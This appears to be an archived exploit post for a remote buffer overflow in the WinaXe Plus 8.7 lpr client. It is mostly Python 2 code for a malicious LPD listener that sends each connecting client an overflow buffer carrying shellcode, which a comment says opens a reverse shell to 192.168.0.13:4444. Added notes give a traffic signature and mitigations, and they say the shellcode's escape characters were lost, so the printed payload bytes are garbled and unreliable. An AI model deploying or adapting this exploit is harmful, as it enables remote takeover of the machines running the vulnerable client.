WinaXe Plus 8.7 Buffer Overflow
Posted on 17 January 2017
# Exploit Title: WinaXe Plus 8.7 - lpr remote buffer overflow
# Date: 2017-01-16
# Exploit Author: Peter Baris
# Exploit link: http://www.saptech-erp.com.au/resources/winaxe_lpr.zip
# Software Link: http://www.labf.com/download/winaxep-ok.html
# Version: 8.7
# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows 10 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64
#Start the fake LPD daemon -> Add the network printer -> Close
"""Proof-of-concept malicious LPD (TCP/515) listener for the WinaXe Plus 8.7 lpr client.

The script does three things only: bind TCP/515 on every interface, accept
any incoming connection, and immediately send one fixed oversized response
before closing it.  The vulnerable party is the *client* (the lpr component
that connects when a network printer is added, per the header comment), not
a real print server.

Defender notes:
  * Traffic signature: a "print server" that answers a fresh TCP/515
    connection with a large fixed blob before the client has sent any LPR
    command.  Under RFC 1179 the client normally speaks first, so a server
    that talks first is itself anomalous.
  * Mitigation is client-side: restrict outbound TCP/515 from affected
    hosts to known print servers, and update the client if a fixed build
    is available.
  * This is Python 2 source (``print`` statement syntax).
  * NOTE(review): the string literals below have lost their escape
    characters in extraction and are plain ASCII text as printed (351
    three-character groups), so the byte count in the author's comment
    does not describe this listing as it stands.
"""
import socket
# WinAxe Plus 8.7 - lpr remote buffer overflow
# Author: Peter Baris
# Tested on Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows 10 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64
#reverse shell to 192.168.0.13 port 4444, length: 351 bytes, bad characters x00x0ax0d
# Author-supplied payload, kept exactly as the page prints it.
shell = ("xb8xb1x79xd9xb5xdbxdcxd9x74x24xf4x5bx33xc9xb1"
         "x52x83xebxfcx31x43x0ex03xf2x77x3bx40x08x6fx39"
         "xabxf0x70x5ex25x15x41x5ex51x5exf2x6ex11x32xff"
         "x05x77xa6x74x6bx50xc9x3dxc6x86xe4xbex7bxfax67"
         "x3dx86x2fx47x7cx49x22x86xb9xb4xcfxdax12xb2x62"
         "xcax17x8exbex61x6bx1exc7x96x3cx21xe6x09x36x78"
         "x28xa8x9bxf0x61xb2xf8x3dx3bx49xcaxcaxbax9bx02"
         "x32x10xe2xaaxc1x68x23x0cx3ax1fx5dx6exc7x18x9a"
         "x0cx13xacx38xb6xd0x16xe4x46x34xc0x6fx44xf1x86"
         "x37x49x04x4ax4cx75x8dx6dx82xffxd5x49x06x5bx8d"
         "xf0x1fx01x60x0cx7fxeaxddxa8xf4x07x09xc1x57x40"
         "xfexe8x67x90x68x7ax14xa2x37xd0xb2x8exb0xfex45"
         "xf0xeax47xd9x0fx15xb8xf0xcbx41xe8x6axfdxe9x63"
         "x6ax02x3cx23x3axacxefx84xeax0cx40x6dxe0x82xbf"
         "x8dx0bx49xa8x24xf6x1ax17x10xf8xd7xffx63xf8xf6"
         "xa3xeax1ex92x4bxbbx89x0bxf5xe6x41xadxfax3cx2c"
         "xedx71xb3xd1xa0x71xbexc1x55x72xf5xbbxf0x8dx23"
         "xd3x9fx1cxa8x23xe9x3cx67x74xbexf3x7ex10x52xad"
         "x28x06xafx2bx12x82x74x88x9dx0bxf8xb4xb9x1bxc4"
         "x35x86x4fx98x63x50x39x5exdax12x93x08xb1xfcx73"
         "xccxf9x3ex05xd1xd7xc8xe9x60x8ex8cx16x4cx46x19"
         "x6fxb0xf6xe6xbax70x06xadxe6xd1x8fx68x73x60xd2"
         "x8axaexa7xebx08x5ax58x08x10x2fx5dx54x96xdcx2f"
         "xc5x73xe2x9cxe6x51")
#100299DD - CALL ESP in xwpdllib.dll
# The single fixed blob sent to every client: 512 filler characters, the
# address literal named in the comment above, 32 repetitions of "x90", then
# ``shell``.  The name ``buffer`` shadows a Python 2 builtin.
buffer="A"*512+"xddx99x02x10"+"x90"*32+shell
# Standard LPD/LPR port.
port = 515
s = socket.socket()
# 0.0.0.0 binds every interface: any host that can reach this port is served.
ip = '0.0.0.0'
s.bind((ip, port))
s.listen(5)
print 'Listening on LPD port: '+str(port)
# Serve forever: each client receives the blob and is disconnected at once.
# The listening socket is never closed and ``addr`` is never used.
while True:
    conn, addr = s.accept()
    conn.send(buffer)
    conn.close()